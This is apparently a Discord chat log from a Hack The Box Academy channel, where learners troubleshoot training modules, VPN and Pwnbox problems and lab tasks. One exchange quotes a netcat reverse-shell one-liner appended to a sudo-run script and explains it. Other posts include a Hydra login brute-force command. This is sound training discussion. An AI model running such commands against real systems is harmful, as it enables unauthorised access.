#modules

@grand locust DM me bro 🙂

@muted kite if you need help with FFuF module let me know!

Sure when is the best time for you? I'm currently trying to upgrade my vb right now

I'll just shoot a question when I have one

Hi all, quick question. Anyone else have issues using proxychains?

the module? which part?

Hi. Module "Using web proxies", section "Proxying tools" proxychains doesn't really seem necessary specifically, besides being shown as a useful tool, so i've been experimenting with it for the last couple of hours.

specifically, using 'proxychains curl <whatever.com>' will return what you ask of it, provided the proxylist in '/etc/proxychains4.conf' is present and has 'some kind' of valid ip in the proxy table, but traffic does not seem to route through that proxy at all, and basically just runs a curl

that part?

ya ive already figured out that 'https' is not a valid schema for the config

it only accepts http, socks4, socks5 and raw

i happen to be using ZAP, but it catches 'curl <whatever.com> --proxy localhost:8080' no problem

so its not a matter of curl through proxy, but a matter that proxychains refuses to forward through the localhost at 8080

also tried install, uninstall, restart after config changes, running as sudo, praying for rain, peeing on my shoes. etc

you can see the curl run through zap tho right?

only when running curl --proxy by itself, but not with proxychains

I think that is what it is useful for. So if i run metasploit through the proxy I can see what metasploit is sending and recieving in burp or zap

right. Zap catches whatever i send to it, so the problem is specifically with proxychains and how its handling traffic. doesn't really seem to be much info after googling for an hour or so, so I'm guessing proxychains just doesn't want to cooperate for whatever reason

/rank

huh that was weird

How are you determining if traffic is being routed through the proxy?

'$ proxychains4 curl ifconfig.me/ip' -- curls and returns info from ifconfig.me no problem. Shows no traffic in ZAP

'$ curl ifconfig.me/ip --proxy localhost:8080' -- curls and returns info, but shows traffic in ZAP

zap is just monitoring the localhost 8080 right?

yup

guess i should also mention works fine with firefox, foxyproxy, etc

hmm not sure

also should mention i've tried 'proxychains' and 'proxychains4', as well as saving the .conf file with different editors, using different .conf configurations

Ya, long shot, I've basically tried almost everything, its really a nothing problem, I'll probably never use it even if it did work, but the fact that it wouldn't has been driving me crazy since lunch

I appreciate all the help though.

ya sorry I couldnt be more helpful, I only thought about using it to reroute stuff through burp and zap

I havent used it since the module tho either

I've seen how it can be really quick and useful for quickly routing stuff, and multichaining it with other services and proxies, so it seems like cool stuff. Lol ya i figured if it did work it would've at most been 'oh thats neat' then i wouldve forgotten about it immediately

I used apt to get it, I might try using different builds from the git repo

Anyone around to answer a cross site scripting question?

you appear to be correct, it's going through the wordlist I think 87,649

I was going to leave it til tomorrow, but I know I would have forgotten what you told me unless I do it now

what does COOBS mean precious?

cubes?

stonks?

oh it's zero cubes for the exercise

lol its the principle of the matter

but the knowledge I definetly need to know

So I receive output, but that still doesnt give me the answer to the question? HTB sure is filled with riddles

WHO PING

hey can anyone help me with this question

"Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, unzip the file, and run "hasher upload_nix.txt" from the command line. Submit the generated hash as your answer."

Linux File transfer methods section of File Transfers

I uploaded the file to the machine and ssh'd into the box but there is no unzip command on the machine. is that intentional?

What if you unzip it on your machine, transfer it then run the command?

i tried that but it says incorrect when i submit it

i got it had to use another zip command

Nice

hey. im in the web attacks module at the bypassing encoded references section and i kinda stuck. i should URI decode some thing which i'd want to do in the console but so far i haven't found a command for that. pls help

you bunch of mother FUZZers!\

which web attack module? which question and answer?

im just now doing ffuf, very slowly

Any news on new modules? It's been a month without courses so far.

why have you completed them all?

I need a full time mentor to help me through all of them and it appears your just in time!

@sly nebula

😛

im just kidding of course

Hi all, I'm doing the "Using Web Proxies" module and on the ZAP Scanner question it says that I should get a high level vulnerability which I should use to read the flag but I'm only seeing medium alerts. I'm using the built-in browser of ZAP. Can anyone pls give me a hint? am I missing something?

Can anyone tell me about how long it takes to populate the CPEs list once you've completed a module or 2?

Hello together, I have big troubles with the performance of the academy machines. Very often my VPN crashes (every 2min) and reconnect, but the machines are a long time not reachable. This sucks hard. Is this normal and this with an VIP account?

Yesterday, It was actually not possible to work with the academic modul. VPN was connected, but the machines was nearly not reachable over hours...

I know some others had the same problem, but after they re-downloade the VPN profile / ovpn file again, everything has been working fine today.

Im the same situation with the academy, im using pwnbox though, been trying to reach support for over an hour, took them 20 min to reply, wrote 2-3 things then they stopped answering again. Not impressed

Thx, I actually tried it with no success 😦

are you using a VM and is the network set to NAT, then try in BRIDGE mode, that can also help a lot.

yes, i actually tried pwnbox too, with the same problems. Seems they have big problems with anything...

🤦‍♂️

VPN key for academy is different than starting point. Make sure you are using the correct one. Or download a new key and remove the other ones. If you run two VPNs at once, they will cancel eachother out.

if your using linux also, make sure it's updated and upgraded

thanks for the hint, but thats not the problem. A friend I worked with had the same issues, not so bad like me but with breaks every 10min

what kind of connection issue, whats your setup?

vm or regular OS?

kali linux?

Its a Win10 with virtualbox on NAT mode. VM is a Kali

I actually cannot set a bridge mode, how an other member described. Virtualbox shows no options for an adapter. Seems an steady problem with solutions, but I could not fix it yet, to try this

and it works fine with the normal HTB platform, without so big problems. Its a problem with the academy

How to change VPN in Academy? With pwnbox there's only one instance to launch and no settings. And one button to start the target machine, im only using their stuff none of my own. Still doesn't work

In virtualbox you just got to setting and network preferences and switch NAT to Bridged, thats it

there is a dropdown that has about 5 network categories

can you upload a screenshot?

of course, I know this all. I cannot chose an adapter, its empty. Its virtualbox issue I have to fix somehow. First tries dont work... but thats not the problem, it works with normal machines

in every module on every page with an exersize there is an option at the bottom to download a new vpn key

Gimme a sec, I got you.

https://www.kali.org/docs/virtualization/install-virtualbox-guest-vm/

reinstall a new kali linux using that link as your guide

@agile oriole

Unfortunately there isnt. I have Full screen, terminate, reset and extend life. Only buttons there are
On target I have reset only.
Below this there's only the exercise question, nothing more

show a screenshot

click next until you see one

@dusty timber

working on it 🙂

they are not in each page

ah, going from module page 1, brb

did you find it sh333p?

Ok yea found a page with download new VPN key, now im trying to install it on the pwnbox

Im not sure about that one

I think you just use it on your actual OS

But im not using a vpn to connect to the academy?

I mean with pwnbox it should all be on their side right?

yeah pawnbox should be fine alone

but dont take my word for it

Thats why I got it, to avoid stuff like this :p

Thanks for your help though

yeah, I didnt realize you were using pawnbox until now

your not using a virtual machine than

No no

there are many people who claim pawnbox gives them no issues, I am not one of them.

It was working without no problems for me for two days, now it wont work at all lol

what changed?

two days ago

are you a windows user?

I changed from one course to another, thats the only thing ive done except for following along in the sections

Yea I use windows

Ok, it seems to be fixed for me. The difference I see now, when I spawn a target it doesnt show the ports like it does in my screenshot above, only the address (as it should I guess)

So support guy did something, not sure what but it looks like he managed to solve it

What a relief, thanks again for helping out @muted kite

sure sounds like I just kept you distracted while the tech guy worked

he didnt respond for a long time so I thought he had gone home 😂

Well now we all know tech support does work

And its broken again, something is definitely up lol. This time ill wait in the support chat :p

Ok, i reinstall Kali, vbox, everything. And yes, It works know. I cannot imagine what the problem was, cause it works for normal htb machines... and pwnbox works not too in the academy...

so your able to move forward right?

got a new vpn key and all that?

sometimes it just all comes together

another happy customer...

i am having this problem where my machine is still running

how can i deactivate it

any ideas

??

it's not running, log in and out

I mean logout and log back in

yep done that

reboot

VM?

i got disconnected temporarily

are you on a virtual machine?

nope

i use my kali

on pc

so how are you connecting to starting point?

your vpn

did you download a vpn key

the vpn is disconnected but still its showing active

yes

what does the terminal say?

type ifconfig tun0

'ifconfig tun0'

does it show the vpn ip address in inet?

nope its not showing

than its not connected

the platform is missreading

what are you trying to do

i downloaded it at first connented my vm then got disconnected

now its not reading any inpys

inputs*

you must run the vpn from your terminal before you start the machine

sudo openvpn starting_point_ovpn

or whatever the name is, once it's connected, than you start the machine

show me your ovpn file

in a picture

go to your terminal

push connect to htb-.choise sever-> download openvpn config-> in terminal open vpn 'name file'

thanks meshokkonoply

I didnt realize he didnt have it downloaded until now

In terminal command: openvpn 'name of downloaded file' and run

ok

Anyone know if there's a known issue with the web apps module and the HTML injection question? It tells you to write HTML to make a link say Click Me. It's easy, I tested it on the server, but when I put it in as the answer it gives me the middle finger.

next on website HTB push button connect to HTB

<img> ?

That for me?

yeah

yes

Stand by

it wants something simple like that I think

yes all done but finally getting a last error

push on button spawn machine

stop.

but it's the same machine which i'm trying to stop

IZROTH what are download?

I got it, it was dead set on me using www in there. Picky syntax...:-D

i mean file for machines or for starting point?

starting point downloaded

hmm

initialization sequence completed

I think you need restart website

*reload

Hi, I am having some trouble with footprint lab-hard, I have found the private key, but I am having whet try to sue it.

do you mean fingerprint or idk i never heard of a hard machine/box with a similar name

done it

and?

No footprinting module

ohh

i havent done that

lol wait this is the modules section of course XD

sorry

screenshot of terminal and HTB screen?

your vpn is connected now you must spawn the machine

leave that tab open so long as you spawn the machine

the machine is loaded, try to work on it now

the target it not showing

*ip

not sure what you mean by that

i got temporarily disconnected i was doing my tasks but as soon as the connection went off the access to teh lab paused i can no longer acces the lab

it says your connected to htb and it also says your machine is spawned

click starting point

in green

but i lost the previous machine

the machine doesnt matter

each machine gives the same results

reload

yes the reload or stop both are missing

gimme asec

im in linux now

let me see how I was doing it

ok

anyone around to offer guidance on the last footprinting problem?

DM if you still need help

I'm having trouble using powerview in the AD module and could use a hand, think I'm missing something pretty simple here but not sure what

any tips on Login as the user with the id 5 to get the flag?

Im hardstuck

what module?

sql injection fundamentals

Using comments

im looking one sec

Feel free to DM

Anyone around to answer a question on the Linux Priv Escalation module?

alright I got it dm me

++verify

Please see your DMs for instructions on how to verify your HTB account.

Im stuck on the 3rd problem too and could use a pointer if you are free

@livid pier you can DM anytime.

I am stuck for a while now in the Web attacks - Skills Assesment. I found the first step. I understand what I need to do next, but don't know how to achieve that. Can anyone help me?

Anyone else get tickled when their target machine starts running out the clock, and you manage to figure out whatever with only a couple minutes to go? xD good stuff

Hey Guys

I’m really stuck on the FFUF module

Is someone out there that have finished it willing to help me?

Pls

@woeful oxide sry m8 haven't done it yet

linux priv esc module > Cron Job Abuse > "find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null" can someone explain me why we are using -path /proc, and why proc directory Thanks.

Im working my way through that mod too, and no it isnt easy..

I will try and help you, once I've completed it

Hey, Just a quick update that is worth noting. We have recently updated to an improved version of Pwnbox. With that is one change you may want to know about regarding using sudo and running commands as root. You will need to use the password that is located in the credentials file on the desktop. This gets autogenerated when you hit start instance.

Awesomeness!

pawnbox just came out with a new version read up

Wondered where those desktop credentials came from, thought I'd just been overlooking them

Ya we upgraded Pwnbox. Its similar to the one that runs on the main HTB site now.

Me too

any IT?

is it a thing that most target boxes on the vpn block icmp requests?

Have you found a solution? If not, feel free to DM me

I need a sanity check for one of the powershell LDAP enum module questions if anyone's got a sec, feel like I'm answering everything it's asking for the filter but nothing's really turning up

Hi all. Just starting with the Academy. I've hit my first roadblock with Burpsuite. Once I enable Burp in Firefox in the Pwnbox, I enter the generated target IP/Port. Burp doesn't get anything in the repeater after forwarding. I'm following the instructions verbatim. Have there been other problems with this recently?

right click and send to repeater

I know I hit Ctrl+R like the tutorial said, and that didn't do anything. I'll try with the right click when I get back to it.

My bad i misread your initial question I thought you wernt able to get something into reapeater

Burpsuite gives me lots of issues @livid pier

i dont have issues with burp, i find it to be smooth, I have trouble with zap

zap looks like it give some abilities that burp doesnt have with the free version so I try to use it

What kind of issues do you have with it?

Like webpage is not viewable with intercept on. Gotta turn proxy off or it doesn't work

Issues with decode

I probably need a full course on it

@muted kite I've been banging my head against the wall this past week on the webproxy section, it's hit and miss sometimes between burp and some of the tools you're supposed to use. Just found out zap doesnt have ascii encoding as a processor function in the fuzzer. mfh

Sometimes I get the burpsuite cant load this but i think that is a connection to htb erver error, I have never really used the decode feature

@livid pier Besides the one persistent file, our pwnboxes aren't persistent right? I know I've gotten update reminders every time ive started it so maybe its just a software issue

*burp update reminders

In one of the modules you have to use decode to find the flag

Web proxies are slow

True

I am using kali, when I get the error I hop over to a pwnbox and the error goes away

super annoying before I knew what the problem was, I thought I was doing something wrong, but I would enter the same code on the pwnbox and it would work

Kali Linux is different. It has so many problems with functionality, it's powerful and over usefull

Can't use pawnbox to hack evil Corp can we now?

it runs pretty smooth for me, im alwas amazed by it

I think backtrack was better

before my time

Kali is fully loaded with apps and tools

With everything and more it seems. ITs almost overwhelming it has 100 tools and Ive used like 15

When im done with academy Im going to try to spend an hour or 2 with a new tool each day

Technically Kali has over 600

Apps

thats 6x as crazy

@livid pier @bitter bear that's because the browser's failsafe is tripping since burp's a mediator between your client and server but not trusted at that time since you haven't downloaded burp's cert and uploaded it into the browser's trusted certs. You aren't getting the error on pwnbox because htb staff have the cert already plugged in on bootup

I can try and find the url for the cert

Or better yet find a tutorial on adding it

Is there a link that shows how to do that?

I'll find one

thanks

that would be GREAT

Not as hard of a process as I made it sound

Yep

If you'd also want my advice if you're starting out on htb, buy a month of vip to get access to retired boxes and watch ippsec's walk-throughs on YouTube. Best part is he explains where he stumbles and why what works works/vice versa

https://portswigger.net/burp/documentation/desktop/external-browser-config/certificate/ca-cert-firefox

@muted kite @bitter bear ^^^

Thank you, I've added it to my favorites

yep

The process for adding it is in one of the modules too

Also did not mean to ping you my man lmao

sry about that

myeh whatevs

@livid pier @muted kite @bitter bear feel free to DM if yall have questions about burp

Thank you

yuh

i will homes

In the web proxy module - proxy setup it has step by step instructions too

Thanks a bunch! You live in here or what? xD

Umm, yea

how have i not seen this before?!!>==?

hello I need your help I need to hack an account who can help write to yandex.direct

I think you are lost

maybe

sorry

Anyone got any idea why I can't upgrade the tty?

@unreal flume You are using zsh if I am not mistaken?

If so, the trick is to run these two commands as the following:

stty raw -echo; fg

Otherwise this upgrading trick won't behave as you would expect it on bash.

Thank you very much ill give it a shot

wow thank you it worked

you're a genius

Welcome anytime 👍

attacking web applications with ffuf, but my pwnbox shows that ffuf: command not found?

sudo apt install ffuf

Look at your desktop, there is a text file with credentials, use the password you find in there.

ok installed and works thanks

the password is also displayed in the URL - which can come handy

hello, can anyone help with this.

i keep getting this only for all commands i am trying

Its active subdomain enumeration section in Information gathering module.

That LDAP enum?

are passwords for a user stored in id_rsa?

I am on a module and dont really understand ssh keys

Any particular Module you're referencing?

or is it a general connection question?

getting started module

but I figured it out now

@carmine quail well my id_rsa is saying invalid format when tryna ssh into root

glad to see you figured it out - let us know if you need any other help

@carmine quail

When I try to ssh root@167.99.89.198 -p31468 -i id_rsa it says invalid format

weird - I can't say I've run into that one. I've seen one that says your permissions are wrong, but not that the key is an invalid format

I did have the permissions one but I done chmod 600 id_rsa and it solved that one

ok, but usually it needs to be 0400 - I think...

oh lemme try that

What do the numbers even mean? @carmine quail it didnt explain

and yea still says invalid format

hey I am stuck on the "live engagement" of the shells module. I know i am executing the right exploit but the payload is not executing and i think it might be an internal error or something. i can explain more details but didnt want to use any spoilers or anything

Ive had trouble with this too, I hate using that vpn in the module too

yeah the noMachine is painfully slow and seems like it may be the issue thats causing file uploads to not work

Well i have been putting off finishing that shells module, I will start it now and let you know if I can get any of those shells to work

awesome thanks man ill keep plugging away and see if i can get it to work

Good morning my brothers and sisters. I am stuck. It happens, but I tried and I tried and I can't quite make it.

Login Brute Forcing Skills Assessment Website question #2

I am looking for a flag using Hydra.

My user is -l user

My password file rockyou-10

Running http-post-form on the admin_login.php page.

user&pass is what I found in burpsuite.

So user=user&pass=^PASS^

Then the delimiter

:F=200 (not 404 not found)

No luck cracking the password...

Now if I do mistype there will be a list of honeypot illegitimate passwords listed, 16 I think.

If anyone has any insight please reply to my message or DM me. Much love to all of you today, enjoy your weekend.

hydra -l user -P rockyou-10.txt -F 127.0.0.1 -s 33000 http-post-form "/admin_login.php:user=user&pass=^PASS^:F=200"

Example.

Of my most hopeful failed attempt.

(｡ŏ﹏ŏ)

Im stuck there too, let me know if you get it. I also cant get the login forms attack section, i run hyrda and find the username and password combo then try to enter it and it doesnt work

Goodluck

I will have to go back to that soon

Yeah... If I can skip this and try the service login page and come back to this later I will. If I'm successful with the service login I will definitely let you know see if I can guide you to the right direction, but that's to be determined of course.

Thank you! I will get to it once I finish this shells module

hi guys.

Is there someone that can explain me this command i met in the htb academy module "getting started"?

host 1 is not working no matter what i do, tried vector #1 with tomcat and exploit worked but payload didnt execute and then now tried vector #2 on the status page and i bypass the upload filter but get a 404 when i try and navigate to the /files/shell

yeah what is it?

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

is used to start a reverse shell

i can't understand the beginning and the end

all the stuff around the tmp folder

so that is a one liner to start a reverse shell as you said. it removes anything in /tmp/f if it exists then makes a FIFO (first in first out) file in the tmp/f folder then it pipes what is in the /tmp/f folder to /bin/sh which is essentially bash and redirects standard output and error (2>&1) to netcat of your ip so your computer through netcat can see the output and error of commands

anyone correct me if i said anything wrong please^

what does tee do?

so why i have to create a piped name with mkfifo and redirect to nc?

it takes the input of one command and outputs to a file and to the screen output

is not enough just to use the nc part?

Thank you!

i've tried upload just the nc part but the beaveour is quite strange!

that is a good question, i am not 100% but i think it is to run commands through a file in the tmp folder where you have permissions so you use netcat to write to the file and then use the file to execute commands

i might be wrong so dont take that as gospel but i think thats why

Hi

mmm... i don't know

why i can't send message in genral channel?

Have you verified?

yeg

*yeh

well, what's problem ?

i've appended this line in a file that can be run with sudo without the need of a password. if i append just the nc part the shell that is launched have a strange behavour: i have to type in the target machine to have an answer im mine!

Idk

okay, thank u

anyways thanks for your help

interesting yea its always interesting to play with stuff like that, now you have me curious so imma look into this more

🙂

you ever need help feel free to dm

insufferable

tell me about it lol...its unusable almost

Please see your DMs for instructions on how to verify your HTB account.

hey, why I got 1020 error when I get into hackthebox website? :_)

were you trying to ddos the site?

Hi, I know this question has been asked several times, but I can't get firefox to work at all on my workstation; it won't connect to anything. I tried changing the proxy settings, but nothing I do has worked. I'm really new to the academy and am stuck on the burp introduction.

DO you have a paid account?

I have the free account

you dont get internet access on the free acount

So it'd be impossible to do the task without a subscription?

No

If you are trying to connect to a box within the network you should be able to connect

I'm from Iran, is it boycott for Iranian?

Try resetting your box. Meaning if you're inside the browser running the virtual machine there just reset it.

It should go back to the default State and hopefully it'll work for you again.

I tried that, but it didn't work either (

making any progress?

Try #613049811481919508 ??

i kept trying a couple different things and nothing really worked so im going to take a break and try more later

did you try the metasploit and the manual upload with msvenom?

Hi, I am stuck at the "Attacking Web Applications with Ffuf " Modul - Skill assesment. I trie to find the page with says "'You don't have access!'". But when I run a recursive scan I get 1000 of results and I dont know how to properly filter them cause they all have the same size etc. A tip would be greatly appreciated. Thanks in advance 🙂

-fs tag

if the most prevalent size was 1000 you would -fs 1000

y but they all have the same size

hmm

I tried both

I just gave up again

It disconnects every 2 minutes needing 1 min to reconnect

I walmost went crazy

yeah i feel that

I think part of the problem is im not sure how to set up the listener

Should we use that ip? when i ifconfig it says our ip is 172.17.0.1

But its impossible to expermient because it freezes after every keystroke

Do you need to switch network configuration to install ftp, etc in the Starting Point Pwnbox? I can't reach the repos to install them

You cant connect to the internet with the free service

It should have everything you need

oof, its saying that ftp isnt installed. Tried multiple boxes

hmm they just updated the pwnbox maybe they forgot something

command is just ftp right? Like 'ftp -h'

ya

"bash: ftp: command not found"

welp

I would recommend getting kali

I have found pwnbox to be a nightmare

yea i think ill have to

plus only 2hr/month is kinda a yike

Sorry to bother you but where is vpn key in module , it is gone ??? I would like to connect my VM with

I agree for pwnbox

it's nice starting out but you'll find pretty quick it's missing a lot of stuff/isn't updated the further you jump in, but still v nice

It's slow and copy/paste doesn't work....

The copy paste not working kills me

it works you just have to ctrl + shift + v

but yea im switching to kali now lol

I found a good guide to download the virutal machine and install kali if you want

I'm also part of the "Can't copy and paste into Pwnbox" club 😦

It pains me

K A L I B O Y S

It doesn't work for me..

But do you use VPN ?

To connect to the 'victim' machine? yea i will

where did you find the vpn configuration ?

pwnbox doesnt need it

I havent set it up yet but I think the walk through for meow shows you how

To do it with kali, top right it sas connect to HTB, then click starting point, then open vpn

download that file, then run sudo openvpn startingpointfile.opvn

I did it

You can download the VPN Key for the Academy here:
https://academy.hackthebox.com/vpn/key

It works, thanks !

Hi all - Supernoob beginner here so apologies for the simple question...

I'm doing the Learning Linux fundamentals course on the accadamy (which is great) but i'm running into a brick wall. I'm using the pwnbox to follow through with commands which works generally OK however when i use sudo it's asking for a password... For the life of me, i don't know what that could be..

Its on the desktop

its also in the url

The password is written above the vm window on your right pane, also on the desktop of your kali in a document

my_credentials

Ahh doh.. Thank you.. that worked.

Legends

I could use some help with the final question for bloodhound fundamentals

Ive e got a question with academy

For students, is there anyway they can buy the student package

and get access to tier 3 modules?

Like priv esc?

I dont think so, gotta by cubes

I am planning on paying for one month $68 for 1000 cubes

doesnt make sense to buy 1000 cubes for $100 when I can get 1000 for $68

Im also poor tho

The real question is tell me why on the web attacks module the question says search the first 20 people for the flag and the 21st person has the flag. wtf mate?

or maybe 0 doesnt count

There’s one with $38 isn’t it

ya $38 for 500

thats $76 for 1000

Anyone know why the accesschk command isn't available on the target box that I'm working on?

Nvm

does anyone know how to reslove this issue?

Hi, I have a question regarding the web proxy module

Copy paste of image doesn't work here ?

Anyway, in the skill assessment questions, 3rd question, we have found decoded the cookie that a web page gives us, and know we understand that this 31 bits cookie is a 32 bits MD5 hash missing one character that would need to find using the fuzzer

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

what's your question?

I'm trying to think about the right way to explain it

Euhm

I understand how to do it, and I understand that the result will be a list of cookie (one for each combination)

but what should I do with that ? How can I come to know which character was the missing one

well yes and no, you'll only have one full cookie that will let you access the page

do you know what "fuzzing" means?

Oh, that will log me in as an admin ?

I believe so

you're fuzzing the last character of that cookie so it's a proper md5 hash

in other words, you can see the hash as a 32 character long password, and you only have the 31 first chars, what would you do?

to send it in the post request ?

yeah that would work, or generally just try to interact with the server using the newly created cookie

I'm not sure I got it

So the purpose is just to interact with the server (so let's say send a get request) with the new cookie that we find from the 32 bits hash ?

and once the right cookie is sent to the server, I will be authenticated as the admin ?

yes but you can only find the proper cookie by sending it to the server, for example a page that requires to be logged on

alright

if the cookie is incorrect you usually get a forbidden and/or a redirect

so if you just get the page, that means you have the proper cookie

and yes as it's the admin's cookie you would be admin

So, if I understand correctly, along with my attempts to send a get request with the cookie, I'll either get an error, or the admin page ? Those are the only two possible outcomes ?

I feel like when I tried that, I just got as a result the same login page as the response

But I'll try again, maybe I did something wrong

that should be correct.

Alright it worked, thank you very much

Is anyone else experiencing problems with the sql injection module, second paragraph (SQL Statements)? I just finished the previous question and it worked fine. After spawning the new target in the IP isn't pingable, neither responding to my attempt to connect with mySQL. Google is pinging.

Tried it out. Same problem here...

Can someone explain to me how to locate the flag.txt in the public exploits module? I have attempted to Nmap to my target machine and when searching for exploits in Metasploit I can see an exploit for the simple back up plug in on the site; I run it after setting RHOSTS and RPORT but get a general directory with no real access

Ohh that's weird. Thanks for letting me know man! I've been attempting to troubleshoot this for a while now ahaha

Still looking for help if anyone has sees this and has any insight please DM me.

Thanks

Feel free to DM me for assistance on Shells & Payloads when you get time and if you still need it.

@sand falcon That's a weird one. Your command syntax looks correct... wish I had a better answer for you lol.

i have no idea what's happening here

@sand falcon pls be careful with spoilers, i have to remove your screenshots

oh god, sorry for the mistake. can you please gimme the answer for that

no because you won't learn anything from it
its not about getting the answer its about understanding and getting your way to the flag

so i got the flag alrady

i want to clarify why it does not work with crackmapexec

ребят, тут есть русские?

Нет

ооооооо наш

ура

@rustic sage @sand falcon only English pls guys

ok

sure. @drifting knoll

so can you explain why it happens? because i though cme would be a great tool. but now i have conflict

can i DM to you @drifting knoll

troubleshoot it
compare the results and network traffic from cme and the tool that worked for you to get the flag

woh that's great idea. letme check

Stuck on firewall evasion also for a week now. I found two open ports but the versions displayed aren't the correct ones. The search continues.

@tough quarry DM me brother

still unable to figure it out. traffic was encrypted. totally mess with my mind now

We want to remind all of you of the rules regarding PMs and that they are for good reasons.

We want to support you all and help you learn quickly and a lot. However, the hundreds of PMs a day slow us down because contacting a staff member without permission is for technical emergencies (related to the modules in this channel) only. We always pay attention to that. In addition, as developers of the modules, besides supporting you, we also work on new modules, develop VMs, improve the concepts and try to make it as close to reality as possible for you, which requires focus and high concentration. Therefore, pinging or PMing is a distraction and delays the development process, and as a result, you will have to wait longer for new content.

If you ask a question here or get stuck, communicate with each other and help each other out. Teamwork is essential in this area and requires practice which you will get from it. If we developers don't respond to your questions, it doesn't mean that we ignore you, but rather it's a reminder to read through the content again, try to understand the concepts and functionality, and look for ways to solve the tasks. In real situations where you will face similar challenges, it is crucial to learn to deal with these situations and to be able to research for them because no one will give you the solution in that real case. Again, this skill can only be learned through practice in which you develop your own problem-solving methodology.

Therefore we ask you not to contact us for no reason but only in technical emergencies or with explicit permission. Don't take away each other's experience but help each other to train the analytical skills to develop new ideas that will help you in the future.

Good evening, I would need help with the "getting started" module, I am at the public exploits and I am asked to find the services running on the server so for that I do an nmap -sC - sV -Pn <ip target>, which gives me a port used by nginx. At this point I don't know how to find the exploit, the clue is: search for plugin exploits, except I don't know how to search or refine my search

you can use searchsploit or google

searchsploit is a command line

Maybe you are looking way too far. What web application is running on the web server? Can you extend this application with plugins?

How can I know which application is running on the web server?

Open your web browser and type http://<ipaddress> into the address field.
If the web server is running on a different port, just append ":<PORT>".

helo bro, I want to ask how to run http.server command in linux? I've been looking for the command to not produce results in my linux, is there a solution?

this?sudo python3 -m http.server 8000

8000 would be the port

I've experimented with that command, but the http.server command in me doesn't exist.

what error do you get when you run it?

python3: can't open file '/home/cyber4rd/Documents/HTB/Archetype/http.server': [Errno 2] No such file or directory

I mean the file doesn't exist, how can I get that file and then run it?

https://github.com/python/cpython/blob/3.10/Lib/http/server.py

your are doing something wrong - probably trying to open file with that name based on error you pasted

python3 -m http.server 8000 <-- this must work for you without sudo since its unprivileged port

yes you really, all I got was no file and I had to get the file

Looking at the path it doesnt look like it should be there

thank you bro

I would try other things first tho

Where are the rest of your python files?

if you mispelled module name it would throw different error (No module named <name>) so you must ommit something from commands above

ok bro I understand, thank you once again for the solution

Is there some obvious reason I'm missing that pwnbox can't seem to install ftp using apt-get install?

do you have the free version? It wont connect to the internet

@livid pier That's it. So it looks like I'm paying for the service or using OpenVPN then, yeah?

I would use virtualbox-kali-openvpn

thats all free

I'm stuck on the Linux Priv Esc final section if anybody is around that can help me out. I have Flag2 and Flag4... but I can't seem to get Flag1. Any push in the right direction would be helpful.

Hello everyone, regarding the Meow exercise, I've obtained the hash or flag.txt info...But when entering into text box on HTB, it shows incorrect flag!?

nvm 'HTB{}' was necessary

Can someone give me a hint on the skills assessment of Sqlmap Essentials? I have scoured the site and caught the blind reference but I cant find any parameters to attack.

hello

Hello how can we help?

Hi

wanna learn how to hack android mobiles

anybody who can help?

Just find an 0-day and you're good to go (edit: let it be clear that this is a joke as your question was way too vague)

doesn't help you to learn anything rather you can get in trouble using it

Also please read #rules, we do not entertain illegal activities

If your question is about getting started with android hacking you'll find many resources in #resources-tools

Also in #binex-rev and htb has a couple challenges for android

at the moment we don't have any mobile specific modules but we recommend you to get familiar with the basics first https://academy.hackthebox.com

anyone around who can give me a tipp for Skills Assessment - File Inclusion/Directory Traversal module ? I'm fishing still in the dark

hi, can someone help me ? i'm about to buy cubes on academy htb and i want to know if i buy monthly plan, do i will still have lifetime acces to modules that i bough ?

maybe use the chat on the page for this answer

hey just wondering, are there any plans on making cloud pentesting modules?

yep

oh snap awesome! any eta or is it too early to say?

its too early for now

oki, thanks anyways! will be waiting:)

One of the suggested tools doesn't exist anymore. Unsure how to figure out how to replace it

It's the module getting started

Anyone to asnwer a question on web attacks- advanced file disclosures? - nvm I got it

Has someone finished Value Fuzzing in FFUF Web Attacks?

yes

what wordlist did you use?

I dont remember, did you try that?

Anyone here that can help me with sqlmap essentials? Stuck on the final skills asssesment.

NM I found the answer myself. Just needed to enumerate the page better to find the vector.

Hello everyone, could you guide me on how I could face the solution of an SQLi exercise, if this is not the channel where I can consult, it tells me.

+1
stuck on this task for a few days.
first I thought I found the password but actually it was some hydra "bug" (maybe funny restore point).
but currently searching for the real password... already tried 25 wordlist that can be run in max ~20 min. no success..

if you are still stuck on flag1 you can DM me.

Ya its so wierd, I will run it on the same webpage 10 times and it will give me 10 different username password combinations

I had a problem with hydra and googled "hydra false positives" - top entry mentioned " Also sometimes due to high number of threads the page doesn't have time to load giving you false positives always try to decrease thread count." - not sure everything is believable on the great internet...

anyone knows how we can reset the academy module back to 0?

Task: in the 'titles' table, what is the number of records WHERE the employee number is greater than 200000 OR their title does NOT contain 'engineer'?
My request: SELECT * FROM titles WHERE title != 'engineer' OR emp_no > 200000;
But it doesnt working...
Somebody can help me?

Also tried: Select * from titles where title != 'Engineer' || emp_no > 200000;

But the answers isn't correct

read the 'DOES NOT CONTAIN 'Engineer'

So it doesn't exactly just mean the string 'Engineer'

So what do you think is next?

Isn't with the != Excluding the 'Engineer'? 🤔

yes

But just using != Engineer is only checking the exact string

what did you learn before this? what does % do?

Is the "like" operator

yes

I think if i use "%Engineer%" maybe it works right?

Combined with?

so

if you use != %********?

give it a shot

Okay, let me try

Can i send you dm?

sure

okey the more i work with getting started, the more i get a sense it's slightly outdated

anyone i can ask for some guidance on the getting started module?

A good idea is to do some of the prerequisites modules, that will help you.
Or else just ask here...

okey the issue is that i am on the windows part of getting started

it says windows 10 module

the link gives me a windows 11

virtual machine that is

what is the right step?

it does not matter if it is a Windows 10 or 11 for the things you need to do

okey thanks. it's just stuff like that is throwing me for a loop when i am at the start. i hope you understand

has anyone here done intro to network traffic analysis?

Help on the question before those two! please been stuck need a slight push

which question are you stuck on ?

Send dm if you want

Find and submit the contents of the TXT record as the answer.

if you "dig" into it I am sure you can find the axfr record you seek

cheeky clue 🙂

Thank you everyone, Happy hacking!

I'm trying to login as 'tom' as you see but says successfully logged as 'admin'

@twin raft be careful with spoilers

Ohhhh sorry that's true
